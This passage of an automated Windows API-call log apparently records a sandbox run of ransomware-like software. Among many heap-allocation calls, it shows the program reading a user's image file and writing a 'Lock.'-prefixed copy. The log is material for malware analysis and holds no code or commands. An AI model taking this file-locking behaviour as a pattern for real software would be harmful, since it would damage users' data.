hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781d8 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782a0 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa180 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0123.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.021] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0123.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.021] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0123.021] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0123.029] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0123.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0123.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0123.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0123.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0123.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1c8 | out: hHeap=0x2af0000) returned 1 [0123.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0123.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x37c0048 [0123.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0d8 [0123.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0123.031] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/m3JGHdzSozsPviDT.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\m3jghdzsozspvidt.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f0 [0123.031] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0123.031] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0123.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0123.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0123.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0123.032] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fd0 | out: hHeap=0x2af0000) returned 1 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0123.032] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x90) returned 0x2a684e8 [0123.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0123.033] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming")) returned 0x10 [0123.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a684e8 | out: hHeap=0x2af0000) returned 1 [0123.033] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0123.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0123.033] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a7a130 [0123.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0123.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72388 [0123.034] CreateFileW (lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Lock.m3JGHdzSozsPviDT.jpg" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\lock.m3jghdzsozspvidt.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4f4 [0123.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fe0 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0123.034] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0123.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.034] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0123.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0123.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0123.035] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f00 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0123.035] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0123.035] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0123.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0123.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0123.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f00 | out: hHeap=0x2af0000) returned 1 [0123.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.036] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0123.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0123.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0123.036] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x100000) returned 0x4cdd020 [0123.038] SetFilePointerEx (in: hFile=0x4f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0123.038] ReadFile (in: hFile=0x4f0, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0xf524, lpOverlapped=0x0) returned 1 [0123.040] ReadFile (in: hFile=0x4f0, lpBuffer=0x37c0048, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x37c0048*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0123.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0123.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0123.040] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0123.040] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0123.041] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf524) returned 0x2a8a138 [0123.041] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cdd020 | out: hHeap=0x2af0000) returned 1 [0123.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0123.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0123.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0123.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0123.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0123.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0123.044] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0123.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0123.044] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf524) returned 0x2aaf410 [0123.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0123.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0123.045] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0123.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0123.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0123.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0123.045] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf524) returned 0x2a8a138 [0123.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0123.045] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a8a138 | out: hHeap=0x2af0000) returned 1 [0123.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0123.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa138 | out: hHeap=0x2af0000) returned 1 [0123.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0123.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0123.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0123.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0123.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0123.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0123.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0123.047] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0123.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0123.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a721a8 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0123.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf524) returned 0x2a8a138 [0123.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0123.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72218 [0123.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1c8 [0123.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0123.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72228 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0123.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72238 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0123.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa048 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0123.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa168 | out: hHeap=0x2af0000) returned 1 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa198 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0123.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf524) returned 0x2abe940 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fd0 [0123.103] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 